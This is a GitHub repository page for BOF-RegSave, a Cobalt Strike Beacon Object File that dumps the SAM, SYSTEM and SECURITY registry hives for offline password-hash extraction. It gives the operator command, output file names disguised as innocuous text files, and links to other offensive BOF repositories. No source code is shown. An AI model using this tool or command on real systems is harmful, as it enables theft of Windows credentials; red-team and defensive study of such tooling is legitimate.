Skip to content

Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File

Notifications You must be signed in to change notification settings

EncodeGroup/BOF-RegSave

Folders and files

NameName
Last commit message
Last commit date

Latest commit

07102ae · Oct 8, 2020

History

3 Commits
Oct 7, 2020
Oct 7, 2020
Oct 7, 2020
Oct 8, 2020
Oct 7, 2020

Repository files navigation

About

Beacon Object File(BOF) for CobaltStrike that will acquire the necessary privileges and dump SAM - SYSTEM - SECURITY registry keys for offline parsing and hash extraction.

Instructions

CNA will register the command bof-regsave:

beacon> bof-regsave c:\temp\

By default the output will be saved in the following files:

samantha.txt - SAM
systemic.txt - SYSTEM
security.txt - SECURITY

You can modify the file names by changing entry.c.

Credits

Template & Makefile based on repo from @realoriginal

Reading material for BOF

CS Beacon Object Files

Aggressor-Script functions

Beacon Object Files - Luser Demo

A Developer's Introduction To Beacon Object Files

Github repos

https://github.com/rsmudge/ZeroLogon-BOF
https://github.com/rsmudge/CVE-2020-0796-BOF
https://github.com/trustedsec/CS-Situational-Awareness-BOF
https://github.com/tomcarver16/BOF-DLL-Inject
https://github.com/m57/cobaltstrike_bofs/
https://github.com/rvrsh3ll/BOF_Collection/
https://github.com/realoriginal/bof-NetworkServiceEscalate

Author

@leftp

About

Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File

Topics

Resources

Stars

Watchers

Forks